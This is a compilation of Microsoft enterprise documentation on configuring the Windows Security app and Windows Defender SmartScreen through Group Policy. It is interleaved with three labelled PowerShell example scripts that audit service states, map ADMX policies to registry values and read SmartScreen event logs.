Individually disabling any of the services will not disable the other services or the Windows Security app.

For example, using a third-party antivirus will disable Windows Defender Antivirus. However, the Windows
Security app will still run, show its icon in the taskbar, and display information about the other features, such as
Windows Defender SmartScreen and Windows Defender Firewall.
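The dependency described above can be checked on an endpoint rather than taken on trust. The following script is an added example and is not part of the Microsoft documentation; it relies only on the two service names the note gives (SecurityHealthService and wscsvc) plus the Windows Defender cmdlet Get-MpComputerStatus, and it treats a disabled start type as the condition the warning describes, since a Manual start type is normal for these services.

```powershell
# Added example (not Microsoft's code): audit the services the Windows Security app
# depends on. Service names are taken from the note above; everything else is
# this example's own. Run in an elevated PowerShell session on Windows 10,
# version 1703 or later.

$serviceNames = @{
    'wscsvc'                = 'Security Center service'
    'SecurityHealthService' = 'Windows Security Service'
}

function Get-WindowsSecurityServiceState {
    foreach ($name in $serviceNames.Keys) {
        $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
        if ($null -eq $svc) {
            [pscustomobject]@{
                Service     = $name
                Description = $serviceNames[$name]
                Status      = 'NotFound'
                StartType   = 'n/a'
                Healthy     = $false
            }
            continue
        }
        # Only a Disabled start type is flagged: that is the state the WARNING
        # above describes, in which the app may show stale or inaccurate
        # protection status. Manual is the normal start type for these services.
        [pscustomobject]@{
            Service     = $name
            Description = $serviceNames[$name]
            Status      = $svc.Status
            StartType   = $svc.StartType
            Healthy     = ($svc.StartType -ne 'Disabled')
        }
    }
}

$state = Get-WindowsSecurityServiceState
$state | Format-Table -AutoSize

# Cross-check against Windows Defender AV's own status. These services do not
# control it (disabling them does not disable Defender AV), so the two views
# should be read side by side rather than one inferred from the other.
$mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
if ($mp) {
    $mp | Select-Object AMServiceEnabled, AntivirusEnabled, RealTimeProtectionEnabled |
        Format-List
}

$unhealthy = @($state | Where-Object { -not $_.Healthy })
if ($unhealthy.Count -gt 0) {
    $msg = 'Disabled or missing: {0}. The Windows Security app may report stale ' +
           'protection status; restore the start type through Group Policy or Set-Service.'
    Write-Warning ($msg -f ($unhealthy.Service -join ', '))
    exit 1
}
```

A non-zero exit code makes the script usable as a compliance check from a management tool; the table and the Defender status output are for an administrator reading it interactively.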
Customize the Windows Security app for your
organization
4/5/2019

Applies to
Windows 10, version 1709 and later
Audience
Enterprise security administrators
Manageability available with
Group Policy
You can add information about your organization in a contact card to the Windows Security app. This can include a
link to a support site, a phone number for a help desk, and an email address for email-based support.

This information will also be shown in some enterprise-specific notifications (including those for Windows
Defender Exploit Guard, the Block at first sight feature, and potentially unwanted applications).
Users can click on the displayed information to initiate a support request:
Clicking Call or the phone number will open Skype to start a call to the displayed number
Clicking Email or the email address will create a new email in the machine's default email app, addressed to the
displayed email address
Clicking Help portal or the website URL will open the machine's default web browser and go to the displayed
address

Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of
Windows do not include these Group Policy settings.

Use Group Policy to enable and customize contact information


There are two stages to using the contact card and customized notifications. First, you have to enable the contact
card or custom notifications (or both), and then you must specify at least a name for your organization and one
piece of contact information.
This can only be done in Group Policy.
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Enterprise Customization.
4. You enable the contact card and the customized notifications by configuring two separate Group Policy
settings. They will both use the same source of information (explained in Steps 7 and 8), and you can enable
both or only one or the other:
a. To enable the contact card, open the Configure customized contact information setting and set it
to Enabled. Click OK.
b. To enable the customized notifications, open the Configure customized notifications setting and
set it to Enabled. Click OK.
5. After you've enabled the contact card or the customized notifications (or both), you must configure the
Specify contact company name to Enabled. Enter your company or organization's name in the field in
the Options section. Click OK.
6. To ensure the custom notifications or contact card appear, you must also configure at least one of the
following settings by opening them, setting them to Enabled and adding the contact information in the
field under Options:
a. Specify contact email address or Email ID
b. Specify contact phone number or Skype ID
c. Specify contact website
7. Click OK after configuring each setting to save your changes.

IMPORTANT
You must specify the contact company name and at least one contact method - email, phone number, or website URL. If you
do not specify the contact name and a contact method the customization will not apply, the contact card will not show, and
notifications will not be customized.
Hide Windows Security app notifications
4/5/2019

Applies to
Windows 10, version 1709 and later
Audience
Enterprise security administrators
Manageability available with
Group Policy
The Windows Security app is used by a number of Windows security features to provide notifications about the
health and security of the machine. These include notifications about firewalls, antivirus products, Windows
Defender SmartScreen, and others.
In some cases, it may not be appropriate to show these notifications, for example, if you want to hide regular status
updates, or if you want to hide all notifications to the employees in your organization.
There are two levels to hiding notifications:
1. Hide non-critical notifications, such as regular updates about the number of scans Windows Defender Antivirus
ran in the past week
2. Hide all notifications
If you set Hide all notifications to Enabled, changing the Hide non-critical notifications setting will have no
effect.
You can only use Group Policy to change these settings.

Use Group Policy to hide non-critical notifications


You can hide notifications that describe regular events related to the health and security of the machine. These are
notifications that do not require an action from the machine's user. It can be useful to hide these notifications if you
find they are too numerous or you have other status reporting on a larger scale (such as Update Compliance or
System Center Configuration Manager reporting).
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Notifications.
4. Open the Hide non-critical notifications setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.

Use Group Policy to hide all notifications


You can hide all notifications that are sourced from the Windows Security app. This may be useful if you don't want
users of the machines to inadvertently modify settings, run antivirus scans, or otherwise perform
security-related actions without your input.
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Notifications.
4. Open the Hide all notifications setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.
Manage Windows Security in Windows 10 in S mode
4/5/2019

Applies to
Windows 10 in S mode, version 1803
Audience
Enterprise security administrators
Manageability available with
Microsoft Intune
Windows 10 in S mode is streamlined for tighter security and superior performance. With Windows 10 in S mode,
users can only use apps from the Microsoft Store, ensuring Microsoft-verified security so you can minimize
malware attacks. In addition, using Microsoft Edge provides a more secure browser experience, with extra
protections against phishing and malicious software.
The Windows Security interface is a little different in Windows 10 in S mode. The Virus & threat protection area
has fewer options, because the built-in security of Windows 10 in S mode prevents viruses and other threats from
running on devices in your organization. In addition, devices running Windows 10 in S mode receive security
updates automatically.
For more information about Windows 10 in S mode, including how to switch out of S mode, see Windows 10
Pro/Enterprise in S mode.

Managing Windows Security settings with Intune


In the enterprise, you can only manage security settings for devices running Windows 10 in S mode with Microsoft
Intune or other mobile device management apps. Windows 10 in S mode prevents making changes via PowerShell
scripts.
For information about using Intune to manage Windows Security settings on your organization's devices, see Set
up Intune and Endpoint protection settings for Windows 10 (and later) in Intune.
Virus and threat protection
4/5/2019

Applies to
Windows 10, version 1703 and later
The Virus & threat protection section contains information and settings for antivirus protection from Windows
Defender Antivirus and third-party AV products.
In Windows 10, version 1803, this section also contains information and settings for ransomware protection and
recovery. This includes Controlled folder access settings to prevent unknown apps from changing files in protected
folders, plus Microsoft OneDrive configuration to help you recover from a ransomware attack. This area also
notifies users and provides recovery instructions in the event of a ransomware attack.
IT administrators and IT pros can get more information and documentation about configuration from the
following:
Windows Defender Antivirus in the Windows Security app
Windows Defender Antivirus documentation library
Protect important folders with Controlled folder access
Defend yourself from cybercrime with new Office 365 capabilities
Office 365 advanced protection
Ransomware detection and recovering your files
You can choose to hide the Virus & threat protection section or the Ransomware protection area from users
of the machine. This can be useful if you don't want employees in your organization to see or have access to user-
configured options for the features shown in the section.

Hide the Virus & threat protection section


You can choose to hide the entire section by using Group Policy. The section will not appear on the home page of
the Windows Security app, and its icon will not be shown on the navigation bar on the side of the app.
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Virus and threat protection.
4. Open the Hide the Virus and threat protection area setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.

NOTE
If you hide all sections, the app shows a restricted interface.

Hide the Ransomware protection area


You can choose to hide the Ransomware protection area by using Group Policy. The area will not appear on the
Virus & threat protection section of the Windows Security app.
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Virus and threat protection.
4. Open the Hide the Ransomware data recovery area setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.
Account protection
4/5/2019 • 2 minutes to read

Applies to
Windows 10, version 1803 and later
The Account protection section contains information and settings for account protection and sign in. IT
administrators and IT pros can get more information and documentation about configuration from the following:
Microsoft Account
Windows Hello for Business
Lock your Windows 10 PC automatically when you step away from it
You can also choose to hide the section from users of the machine. This can be useful if you don't want employees
in your organization to see or have access to user-configured options for the features shown in the section.

Hide the Account protection section


You can choose to hide the entire section by using Group Policy. The section will not appear on the home page of
the Windows Security app, and its icon will not be shown on the navigation bar on the side of the app.
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1803 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Account protection.
4. Open the Hide the Account protection area setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.
NOTE
If you hide all sections, the app shows a restricted interface.
Firewall and network protection
4/5/2019 • 2 minutes to read

Applies to
Windows 10, version 1703 and later
The Firewall & network protection section contains information about the firewalls and network connections
used by the machine, including the status of Windows Defender Firewall and any other third-party firewalls. IT
administrators and IT pros can get configuration guidance from the Windows Defender Firewall with Advanced
Security documentation library.
In Windows 10, version 1709 and later, the section can be hidden from users of the machine. This can be useful if
you don't want employees in your organization to see or have access to user-configured options for the features
shown in the section.

Hide the Firewall & network protection section


You can choose to hide the entire section by using Group Policy. The section will not appear on the home page of
the Windows Security app, and its icon will not be shown on the navigation bar on the side of the app.
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Firewall and network protection.
4. Open the Hide the Firewall and network protection area setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.
NOTE
If you hide all sections, the app shows a restricted interface.
App and browser control
4/5/2019 • 2 minutes to read

Applies to
Windows 10, version 1703 and later
The App and browser control section contains information and settings for Windows Defender SmartScreen. IT
administrators and IT pros can get configuration guidance from the Windows Defender SmartScreen
documentation library.
In Windows 10, version 1709 and later, the section also provides configuration options for Exploit protection. You
can prevent users from modifying these specific options with Group Policy. IT administrators can get more
information at the Exploit protection topic in the Windows Defender Exploit Guard library.
You can also choose to hide the section from users of the machine. This can be useful if you don't want employees
in your organization to see or have access to user-configured options for the features shown in the section.

Prevent users from making changes to the Exploit protection area in the App & browser control section


You can prevent users from modifying settings in the Exploit protection area. The settings will be either greyed out
or not appear if you enable this setting. Users will still have access to other settings in the App & browser control
section, such as those for Windows Defender SmartScreen, unless those options have been configured separately.
You can only prevent users from modifying Exploit protection settings by using Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > App and browser protection.
4. Open the Prevent users from modifying settings setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.

Hide the App & browser control section


You can choose to hide the entire section by using Group Policy. The section will not appear on the home page of
the Windows Security app, and its icon will not be shown on the navigation bar on the side of the app.
This can only be done in Group Policy.
IMPORTANT
Requirements
You must have Windows 10, version 1709 (the Fall Creators Update) or later. The ADMX/ADML template files for earlier
versions of Windows do not include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > App and browser protection.
4. Open the Hide the App and browser protection area setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.

NOTE
If you hide all sections, the app shows a restricted interface.
Device security
4/5/2019 • 2 minutes to read

Applies to
Windows 10, version 1803 and later
The Device security section contains information and settings for built-in device security.
You can choose to hide the section from users of the machine. This can be useful if you don't want employees in
your organization to see or have access to user-configured options for the features shown in the section.

Hide the Device security section


You can choose to hide the entire section by using Group Policy. The section will not appear on the home page of
the Windows Security app, and its icon will not be shown on the navigation bar on the side of the app.
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1803 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Device security.
4. Open the Hide the Device security area setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.

NOTE
If you hide all sections, the app shows a restricted interface.
Disable the Clear TPM button
If you don't want users to be able to click the Clear TPM button in the Windows Security app, you can disable it.

IMPORTANT
Requirements
You must have Windows 10, version 1809 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Device security.
4. Open the Disable the Clear TPM button setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.

Hide the TPM Firmware Update recommendation


If you don't want users to see the recommendation to update TPM firmware, you can disable it.
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Device security.
4. Open the Hide the TPM Firmware Update recommendation setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.

Disable Memory integrity switch


If you don't want users to be able to change the Hypervisor-protected Code Integrity (HVCI), or memory integrity,
setting on their computers, you can disable the Memory integrity switch.
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Device security.
4. Open the Disable Memory integrity switch setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.
Device performance and health
4/5/2019 • 2 minutes to read

Applies to
Windows 10, version 1703 and later
The Device performance & health section contains information about hardware, devices, and drivers related to
the machine. IT administrators and IT pros should reference the appropriate documentation library for the issues
they are seeing, such as configuring the Load and unload device drivers security policy setting and deploying
drivers during Windows 10 deployment using System Center Configuration Manager.
The Windows 10 IT pro troubleshooting topic and the main Windows 10 documentation library can also be
helpful for resolving issues.
In Windows 10, version 1709 and later, the section can be hidden from users of the machine. This can be useful if
you don't want employees in your organization to see or have access to user-configured options for the features
shown in the section.

Hide the Device performance & health section


You can choose to hide the entire section by using Group Policy. The section will not appear on the home page of
the Windows Security app, and its icon will not be shown on the navigation bar on the side of the app.
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Device performance and health.
4. Open the Hide the Device performance and health area setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.
NOTE
If you hide all sections, the app shows a restricted interface.
Family options
4/5/2019 • 2 minutes to read

Applies to
Windows 10, version 1703 and later
The Family options section contains links to settings and further information for parents of a Windows 10 PC. It
is not generally intended for enterprise or business environments.
Home users can learn more at the Help protect your family online in Windows Security topic at
support.microsoft.com.
In Windows 10, version 1709 and later, the section can be hidden from users of the machine. This can be useful if
you don't want employees in your organization to see or have access to this section.

Hide the Family options section


You can choose to hide the entire section by using Group Policy. The section will not appear on the home page of
the Windows Security app, and its icon will not be shown on the navigation bar on the side of the app.
This can only be done in Group Policy.

IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.

1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Security > Family options.
4. Open the Hide the Family options area setting and set it to Enabled. Click OK.
5. Deploy the updated GPO as you normally do.
NOTE
If you hide all sections, the app shows a restricted interface.
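Every "Hide the ... section" procedure above (Virus & threat protection, Ransomware protection, Account protection, Firewall & network protection, App & browser control, Device security, Device performance & health, Family options), the Prevent users from modifying settings policy, and the three Device security switches write one registry value that the Windows Security ADMX template defines. The script below is an added example, not part of this topic and not a Microsoft tool: it parses the template and its ADML strings and lists, for every machine policy, the registry key and value name it sets together with the value currently present on the local machine, which is the check to run after the GPO has applied. It assumes the template is named WindowsDefenderSecurityCenter.admx under %SystemRoot%\PolicyDefinitions and that these policies use the plain key/valueName/enabledValue form of the ADMX schema; change the parameters if your template is named or located differently.

```powershell
# Added example: resolve the Windows Security ADMX policies to their registry values and
# report the local state. Not part of the Microsoft topic or of any Microsoft tool.
# Assumptions (not stated on the page):
#   - the template is %SystemRoot%\PolicyDefinitions\WindowsDefenderSecurityCenter.admx,
#     with its strings in <language>\WindowsDefenderSecurityCenter.adml;
#   - the hide/disable policies are simple on/off policies (key + valueName attributes,
#     optional enabledValue/decimal child), which is how the ADMX schema expresses them.
param(
    [string]$PolicyDefinitions = "$env:SystemRoot\PolicyDefinitions",
    [string]$Template          = 'WindowsDefenderSecurityCenter.admx',   # assumed file name
    [string]$Language          = 'en-US'
)

$admxPath = Join-Path $PolicyDefinitions $Template
$admlPath = Join-Path (Join-Path $PolicyDefinitions $Language) ($Template -replace '\.admx$', '.adml')
[xml]$admx = Get-Content -LiteralPath $admxPath -Raw
[xml]$adml = Get-Content -LiteralPath $admlPath -Raw

# $(string.<id>) references in the ADMX are resolved through the ADML string table.
$strings = @{}
foreach ($s in $adml.policyDefinitionResources.resources.stringTable.string) {
    $strings[$s.id] = $s.InnerText
}
function Resolve-DisplayName([string]$ref) {
    if ($ref -match '^\$\(string\.(?<id>[^)]+)\)$' -and $strings.ContainsKey($Matches.id)) {
        return $strings[$Matches.id]
    }
    return $ref
}

$report = foreach ($p in $admx.policyDefinitions.policies.policy) {
    # Machine-class policies live under HKLM; skip per-user and element-based (non on/off) ones.
    if ($p.class -ne 'Machine' -or -not $p.valueName) { continue }
    $key = 'HKLM:\' + $p.key
    # A policy without an explicit enabledValue writes REG_DWORD 1 when enabled (ADMX default).
    $enabled = $p.enabledValue.decimal.value
    if (-not $enabled) { $enabled = 1 }
    $current = $null
    if (Test-Path -LiteralPath $key) {
        $current = (Get-ItemProperty -LiteralPath $key -Name $p.valueName -ErrorAction SilentlyContinue).($p.valueName)
    }
    [pscustomobject]@{
        Policy       = Resolve-DisplayName $p.displayName
        RegistryKey  = $key
        ValueName    = $p.valueName
        EnabledValue = $enabled
        CurrentValue = $current
        State        = if ($null -eq $current) { 'Not configured' }
                       elseif ("$current" -eq "$enabled") { 'Enabled' }
                       else { 'Disabled/other' }
    }
}

# After gpupdate /force on a target machine, every policy you enabled should show State = Enabled.
$report | Sort-Object Policy | Format-Table Policy, RegistryKey, ValueName, CurrentValue, State -AutoSize -Wrap
```

Run it on a machine in the GPO's scope after a policy refresh; a policy you enabled that still reports Not configured means the GPO did not apply (wrong scope, filtering, or the template on the management machine predates the setting), and a policy that reports Enabled without a GPO means something else set the value locally, which is worth investigating.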
Windows Defender SmartScreen
5/3/2019 • 3 minutes to read

Applies to:
Windows 10
Windows 10 Mobile
Windows Defender SmartScreen helps to protect your employees if they try to visit sites previously reported as
phishing or malware websites, or if an employee tries to download potentially malicious files.
SmartScreen determines whether a site is potentially malicious by:
Analyzing visited webpages looking for indications of suspicious behavior. If it finds suspicious pages,
SmartScreen shows a warning page, advising caution.
Checking the visited sites against a dynamic list of reported phishing sites and malicious software sites. If it
finds a match, SmartScreen shows a warning to let the user know that the site might be malicious.
SmartScreen determines whether a downloaded app or app installer is potentially malicious by:
Checking downloaded files against a list of reported malicious software sites and programs known to be
unsafe. If it finds a match, SmartScreen shows a warning to let the user know that the site might be
malicious.
Checking downloaded files against a list of files that are well known and downloaded by many Windows
users. If the file isn't on that list, SmartScreen shows a warning, advising caution.

NOTE
Before Windows 10, version 1703 this feature was called the SmartScreen Filter when used within the browser and
Windows SmartScreen when used outside of the browser.

Benefits of Windows Defender SmartScreen


Windows Defender SmartScreen helps to provide an early warning system against websites that might engage in
phishing attacks or attempt to distribute malware through a socially-engineered attack. The primary benefits are:
Anti-phishing and anti-malware support. SmartScreen helps to protect your employees from sites that
are reported to host phishing attacks or attempt to distribute malicious software. It can also help protect
against deceptive advertisements, scam sites, and drive-by attacks. Drive-by attacks are web-based attacks
that tend to start on a trusted site, targeting security vulnerabilities in commonly-used software. Because
drive-by attacks can happen even if the user does not click or download anything on the page, the danger
often goes unnoticed. For more info about drive-by attacks, see Evolving Microsoft SmartScreen to protect
you from drive-by attacks
Reputation-based URL and app protection. SmartScreen evaluates a website's URLs to determine if
they're known to distribute or host unsafe content. It also provides reputation checks for apps, checking
downloaded programs and the digital signature used to sign a file. If a URL, a file, an app, or a certificate
has an established reputation, your employees won't see any warnings. If however there's no reputation, the
item is marked as a higher risk and presents a warning to the employee.
Operating system integration. SmartScreen is integrated into the Windows 10 operating system,
meaning that it checks any files an app (including 3rd-party browsers and email clients) attempts to
download and run.
Improved heuristics and diagnostic data. SmartScreen is constantly learning and endeavoring to stay
up-to-date, so it can help to protect you against potentially malicious sites and files.
Management through Group Policy and Microsoft Intune. SmartScreen supports using both Group
Policy and Microsoft Intune settings. For more info about all available settings, see Available Windows
Defender SmartScreen Group Policy and mobile device management (MDM) settings.

Viewing Windows Defender SmartScreen anti-phishing events


When Windows Defender SmartScreen warns or blocks an employee from a website, it's logged as Event 1035 -
Anti-Phishing.

Viewing Windows event logs for SmartScreen


SmartScreen events appear in the Microsoft-Windows-SmartScreen/Debug log in Event Viewer.

EVENTID DESCRIPTION

1000 Application SmartScreen Event

1001 Uri SmartScreen Event

1002 User Decision SmartScreen Event
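The Debug channel named above records nothing until it is enabled, and Get-WinEvent can only read a Debug or Analytic channel in forward order. The following PowerShell is an added example, not from this topic: it enables the channel and then pulls the three event types from the last N hours, flattening each event's data fields so the URI or file event can be correlated with the 1002 event that records the user's decision. It assumes an elevated prompt for the enable step; the event payload field names are not listed on the page, so the script does not depend on them.

```powershell
# Added example, not from the Microsoft topic: turn on the SmartScreen debug channel and pull
# the 1000/1001/1002 events from it. Assumptions: Debug channels are off by default and need
# an elevated prompt to enable; the page does not list payload field names, so EventData is
# flattened generically rather than mapped to named columns.
$SmartScreenLog = 'Microsoft-Windows-SmartScreen/Debug'

function Enable-SmartScreenDebugLog {
    # A Debug/Analytic channel records nothing until enabled; it stays on until you disable it.
    & wevtutil.exe set-log $SmartScreenLog /e:true
    if ($LASTEXITCODE -ne 0) { throw "Could not enable $SmartScreenLog; run from an elevated prompt." }
}

function Get-SmartScreenEvents {
    param([int]$Hours = 24)
    $kind = @{ 1000 = 'Application'; 1001 = 'Uri'; 1002 = 'UserDecision' }   # IDs from the table above
    # Debug/Analytic channels can only be read in forward order, so Get-WinEvent needs -Oldest.
    Get-WinEvent -Oldest -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = $SmartScreenLog
        Id        = 1000, 1001, 1002
        StartTime = (Get-Date).AddHours(-$Hours)
    } | ForEach-Object {
        [xml]$x = $_.ToXml()
        $fields = [ordered]@{}
        foreach ($d in $x.Event.EventData.Data) {
            if ($d -is [System.Xml.XmlElement] -and $d.Name) { $fields[$d.Name] = $d.'#text' }
        }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Id      = $_.Id
            Kind    = $kind[[int]$_.Id]
            Payload = if ($fields.Count) { ($fields.GetEnumerator() | ForEach-Object { "$($_.Key)=$($_.Value)" }) -join '; ' }
                      else { $_.Message }
        }
    }
}

# Usage: enable once, reproduce a warning (open a test download or flagged site in Edge), then read
# the 1001 (URI) or 1000 (file) event next to the 1002 event that records what the user chose.
Enable-SmartScreenDebugLog
Get-SmartScreenEvents -Hours 1 | Sort-Object Time | Format-Table -AutoSize -Wrap
```

A 1002 event that follows a 1001 or 1000 event is the bypass the Recommended settings section below is concerned with; if the prevent-bypass policies are in force you should see the warning events without a matching user decision.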

Related topics
SmartScreen Frequently Asked Questions (FAQ)
Threat protection
Available Windows Defender SmartScreen Group Policy and mobile device management (MDM) settings

Available Windows Defender SmartScreen Group Policy and mobile device management (MDM) settings
4/5/2019 • 6 minutes to read

Applies to:
Windows 10
Windows 10 Mobile
Windows Defender SmartScreen works with Intune, Group Policy, and mobile device management (MDM)
settings to help you manage your organization's computer settings. Based on how you set up Windows Defender
SmartScreen, you can show employees a warning page and let them continue to the site, or you can block the site
entirely.
See Windows 10 (and later) settings to protect devices using Intune for the controls you can use in Intune.

Group Policy settings


SmartScreen uses registry-based Administrative Template policy settings. For more info about Group Policy, see
the Group Policy TechCenter. This site provides links to the latest technical documentation, videos, and downloads
for Group Policy.

Each entry gives the setting path, the platforms it is supported on, and a description.

Setting:
  Windows 10, version 1703: Administrative Templates\Windows Components\Windows Defender SmartScreen\Explorer\Configure Windows Defender SmartScreen
  Windows 10, version 1607 and earlier: Administrative Templates\Windows Components\File Explorer\Configure Windows SmartScreen
Supported on: At least Windows Server 2012, Windows 8 or Windows RT
Description: This policy setting turns on Windows Defender SmartScreen.
  If you enable this setting, it turns on Windows Defender SmartScreen and your employees are unable to turn it off. Additionally, when enabling this feature, you must also pick whether SmartScreen should Warn your employees or Warn and prevent bypassing the message (effectively blocking the employee from the site).
  If you disable this setting, it turns off Windows Defender SmartScreen and your employees are unable to turn it on.
  If you don't configure this setting, your employees can decide whether to use Windows Defender SmartScreen.

Setting: Administrative Templates\Windows Components\Windows Defender SmartScreen\Explorer\Configure App Install Control
Supported on: Windows 10, version 1703
Description: This setting helps protect PCs by allowing users to install apps only from the Microsoft Store. SmartScreen must be enabled for this feature to work properly.
  If you enable this setting, your employees can only install apps from the Microsoft Store.
  If you disable this setting, your employees can install apps from anywhere, including as a download from the Internet.
  If you don't configure this setting, your employees can choose whether they can install from anywhere or only from Microsoft Store.

Setting:
  Windows 10, version 1703: Administrative Templates\Windows Components\Windows Defender SmartScreen\Microsoft Edge\Configure Windows Defender SmartScreen
  Windows 10, version 1607 and earlier: Administrative Templates\Windows Components\Microsoft Edge\Configure Windows SmartScreen
Supported on: Microsoft Edge on Windows 10 or later
Description: This policy setting turns on Windows Defender SmartScreen.
  If you enable this setting, it turns on Windows Defender SmartScreen and your employees are unable to turn it off.
  If you disable this setting, it turns off Windows Defender SmartScreen and your employees are unable to turn it on.
  If you don't configure this setting, your employees can decide whether to use Windows Defender SmartScreen.

Setting:
  Windows 10, version 1703: Administrative Templates\Windows Components\Windows Defender SmartScreen\Microsoft Edge\Prevent bypassing Windows Defender SmartScreen prompts for files
  Windows 10, version 1511 and 1607: Administrative Templates\Windows Components\Microsoft Edge\Prevent bypassing Windows SmartScreen prompts for files
Supported on: Microsoft Edge on Windows 10, version 1511 or later
Description: This policy setting stops employees from bypassing the Windows Defender SmartScreen warnings about potentially malicious files.
  If you enable this setting, it stops employees from bypassing the warning, stopping the file download.
  If you disable or don't configure this setting, your employees can bypass the warnings and continue to download potentially malicious files.

Setting:
  Windows 10, version 1703: Administrative Templates\Windows Components\Windows Defender SmartScreen\Microsoft Edge\Prevent bypassing Windows Defender SmartScreen prompts for sites
  Windows 10, version 1511 and 1607: Administrative Templates\Windows Components\Microsoft Edge\Prevent bypassing Windows SmartScreen prompts for sites
Supported on: Microsoft Edge on Windows 10, version 1511 or later
Description: This policy setting stops employees from bypassing the Windows Defender SmartScreen warnings about potentially malicious sites.
  If you enable this setting, it stops employees from bypassing the warning, stopping them from going to the site.
  If you disable or don't configure this setting, your employees can bypass the warnings and continue to visit a potentially malicious site.

Setting: Administrative Templates\Windows Components\Internet Explorer\Prevent managing SmartScreen Filter
Supported on: Internet Explorer 9 or later
Description: This policy setting prevents the employee from managing SmartScreen Filter.
  If you enable this policy setting, the employee isn't prompted to turn on SmartScreen Filter. All website addresses that are not on the filter's allow list are sent automatically to Microsoft without prompting the employee.
